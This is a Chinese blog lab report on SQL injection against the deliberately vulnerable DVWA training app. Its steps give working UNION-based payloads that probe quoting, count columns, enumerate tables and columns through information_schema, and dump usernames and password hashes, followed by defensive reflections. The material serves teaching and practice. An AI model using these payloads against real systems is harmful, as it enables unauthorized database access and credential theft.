dvwa低等级的SQL注入的

最新推荐文章于 2024-10-15 10:20:47 发布
最新推荐文章于 2024-10-15 10:20:47 发布
阅读量281 收藏 10
点赞数 4
分类专栏: Dvwa靶场 文章标签: 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LIU6636LIU/article/details/140388427
版权

实验二 基于dvwa低等级的SQL注入的

  • 实验目的

1、熟悉sql注入的基本流程;

2、掌握Mysql中UNION的使用规则。

二、实验步骤

  1. 打开SQL回显注入页面,先尝试输入1查看查询结果
  2. 通过结果猜测SQL语句:select firstname,surname from xxx where id=我们输入的id
  3. 探测是否存在漏洞,输入1'出现了语法错误回显,说明漏洞存在
  4. 三种注入POC(验证性测试,Proof of Concept):
    变量不在引号中:1 or 1024=1024


变量在单引号中:1' or '1024'='1024


变量在双引号中:1" or "1024"="1024

  1. 一一尝试,发现变量是由单引号闭合的
  2. SQL注入中通常需要闭合,如果语句比较复杂,可以用注释符号闭合。MySQL中三种常见的注释符号:#、-- (注意–后的空格)、/**/
  3. 确定查询字段数:1' order by 1--order by是对某一列进行排序显示,通过二分法不断缩小范围最后确定字段数为2
  4. 确定回显点:xx' union select 1,2 #union是对两次查询结果合并显示,结果中查看1,2的位置
  6. 查询数据库信息:xx' union select @@version,@@datadir#
  7. 查询数据库和数据库名:xx' union select user(),database()#
  1. 利用库名查询表名:xx' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
    利用表名查询列名:xx' union select 1,column_name from information_schema.columns where table_name='users'--
    利用列名查询用户名和密码:xx' union select user,password from users--
  2. 获取用户密码哈希,利用工具获取明文密码

三、实验反思

在进行SQL注入和了解MySQL中UNION使用规则的实验过程中,我获得了一些重要的认识和反思:

安全意识的重要性:

了解SQL注入的原理和方法有助于提高对安全漏洞的认识,以便更好地防范和避免潜在的攻击。

输入验证与过滤:

有效的输入验证和过滤是防止SQL注入攻击的关键。任何接受用户输入的地方都需要进行严格的输入验证和过滤。

掌握数据库操作规则:

对于像 UNION 这样的数据库操作符,理解其使用规则有助于编写更有效和安全的SQL查询语句。

保持更新和学习:

针对数据库安全和注入漏洞,保持学习并了解最新的安全措施和最佳实践,不断更新自己的知识是至关重要的。

总的来说,这个实验帮助我更深入地了解了SQL注入的原理和防范方法,并提醒了我在开发过程中保持严格的输入验证和过滤的重要性,以保障系统的安全性和稳定性。

网安小趴菜
关注
专栏目录
DVWA_SQL注入等级讲解
Keiltest的博客
08-10 1081
本章讲解了sql注入
DVWASQL注入
geejkse_seff的博客
07-30 384
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶场之SQL注入通关详解
2401_87298986的博客
09-21 1031
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name=‘users’)后,会发现报错了,原因是语句中含有单引号。没有进行敏感字符过滤。
DVWA——SQL注入
m0_74426634的博客
04-07 1172
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA-SQL注入(SQL Injection) 中 高级别_dvwa sql注入中高代码分析
2401_84264536的博客
05-02 219
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!后端代码从session中获取用户输入的参数,并根据用户ID获取用户信息并回显到页面中,有回显,可以使用。使用MySQL的Hex函数编译需要查询的表名,并在结果前面加上0x,从而绕过特殊字符转译,根据输入的用户ID查询用户信息并在页面中回显,有显示位,可以使用。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!,大家跟着这个大的方向学习准没问题。
dvwa sql注入 high等级
weixin_43749051的博客
03-07 1058
与Medium级别的代码相比,High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。 High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。 所以sqlmap无法实现注入,考虑手工注入。 虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。且因为是字符型注入,手工注入的过程与Low级别基本一样,直接最后一
DVWA--sql手工注入(高级)
firecjh的博客
06-09 600
实验环境:配置DVWA平台。进入DVWA平台,选择,将安全级别设置为High。点击,进入测试页面。2.判断列数。3.判断显错点。4.获取数据库名。5.获取表名。6.获取列名。7)获取数据。
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 2014
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
dvwa系列-sql注入
一个安全研究员
05-23 2280
前言 本篇博文就不详细讲解sql注入的成因了,有兴趣的就去看看我sqlilabs的博文吧,我后面会慢慢完成sqlilabs的博文 low 我们先来判断注入点吧,用最常规的单引号试一试,报错了,初步判断应该是字符型的单引号注入。 下面就推断一下后台执行的sql语句,因为这是一个根据输入的id来查找信息的地方嘛,后台sql大概是: select id,firstname,surname ...
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1916
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1060
SQL注入web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8503
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 461
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-10 949
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
10-15 552
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 2047
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 2296
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
DVWA实验:SQL注入入门指南
本资源是一份关于"常规漏洞利用-SQL注入实验指导书"的详细文档。它旨在帮助学习者理解和实践SQL注入这一关键的网络安全概念。实验分为几个步骤,首先,需要在DVWA(Damn Vulnerable Web Application)平台上进行操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安小趴菜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值